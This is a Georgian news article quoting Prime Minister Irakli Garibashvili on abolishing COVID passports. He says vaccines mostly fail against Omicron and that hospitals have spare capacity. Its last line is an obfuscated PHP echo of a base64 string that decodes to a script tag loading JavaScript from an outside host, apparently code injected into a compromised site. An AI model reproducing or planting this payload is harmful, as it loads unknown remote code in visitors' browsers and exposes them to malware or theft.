celsiusi
ავერსი საქკაბელი
სხვა შტამების შემთხვევაში სხვა სურათი იყო, მაგრამ „ომიკრონის“ დროს, უმეტეს შემთხვევაში ვაქცინა არ მუშაობს, - ამის შესახებ საქართველოს პრემიერ მინისტრმა, ირაკლი ღარიბაშვილმა მთავრობის სხდომაზე განაცხადა.
 
როგორც მან აღნიშნა, დაიწყო უსაფუძვლო არაარგუმენტირებული სპეკულირება იმის თაობაზე, თუ რატომ მოხდა კოვიდპასპორტის გაუქმება.
 
„ჩვენ შევისწავლეთ აღნიშნული საკითხი და ევროპული ქვეყნების გამოცდილება და პრაქტიკაც. ბოლო ტენდენციების გათვალისწინებით, ჩვენ აღარ ჩავთვალეთ მიზანშეწონილად აღნიშნული ბარათების ფუნქციონირება. აზრი დაკარგა აღნიშნული „მწვანე ბარათების“ გამოყენებამ. თავდაპირველად ჩვენი მიზანი იყო ვაქცინაციის წახალისება და „დელტას“ და სხვა შტამების შემთხვევაში სხვა სურათი იყო, მაგრამ „ომიკრონის დროს“, უმეტეს შემთხვევაში ვაქცინა არ მუშაობს. ვაქცინირებულ პირს ჩვეულებრივ ემართება „ომიკრონი“. მაგალითად, მე ვარ ერთი მაგალითი - მქონდა სხვა შტამი გასულ წელს, ორჯერ ვიყავი აცრილი „ფაიზერის“ ვაქცინით, მაგრამ მაინც დამემართა „ომიკრონი“. მინდა გითხრათ, რომ აბსოლუტურ შემთხვევებში ძალიან მსუბუქ ფორმებში მიმდინარეობს აღნიშნული ვირუსი. მიდგომა შეიცვალა, რადგან აზრი დაკარგა „მწვანე ბარათის“ გამოყენებამ, ამიტომ ჩავთვალეთ საჭირო მისი გაუქმება.
 
მეორეს მხრივ, ჩვენ გავაგრძელეთ ვაქცინაციის წამახალისებელი კამპანიები და ჩვენი მთავარი ამოცანა უნდა იყოს 50 წლის ზემოთ ადამიანების აცრა, რათა, ვინც ასაკში არის და ქრონიკული დაავადებები აქვს, არ გაურთულდეს ეს ვირუსი. სხვა მხრივ ყველაფერი კონტროლქვეშ არის. ევროპულმა ქვეყნებმა და ამერიკამ, ყველამ გახსნეს და აღარავინ ფიქრობს შეზღუდვებზე“, - განაცხადა ღარიბაშვილმა.
 
როგორც მან აღნიშნა, კოვიდის პანდემიის მიმართულებით ჯანდაცვის მინისტრს სრული კონტროლი აქვს.
 
„მიუხედავად იმისა, რომ 200 000-ზე მეტი აქტიური შემთხვევა გვაქვს ქვეყანაში, ჰოსპიტალურ სექტორზე დაწოლა აბსოლუტურად არ გვაქვს. მინისტრი სრულად ფლობს და აკონტროლებს სიტუაციას. 1000-ზე მეტმა ოჯახის ექიმმა გაიარა განმეორებითი ტრენინგი. 100-ზე მეტი კოვიდკლინიკის მედპერსონალმაც მათ შორის. არცერთი მოქალაქე არ დარჩება ყურადღების გარეშე. 8000-ზე მეტი ჰოსპიტალური საწოლი არის მობილიზებული, აქედან 6000-მდე არის ათვისებული და 2000-ზე მეტი საწოლი გვაქვს თავისუფალი. პროცესი არის სრული კონტროლის ქვეშ. ძალიან ბევრ ტესტს ვაკეთებთ, მათ შორის იმაზე მეტს, ვიდრე საშუალოდ ევროპული ქვეყნები და ამაში მართლაც გამორჩეული ვართ. ვფიქრობთ რომ, მარტის ბოლოსთვის სიტუაცია დასტაბილურდება“, - აღნიშნა ირაკლი ღარიბაშვილმა.
1128
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");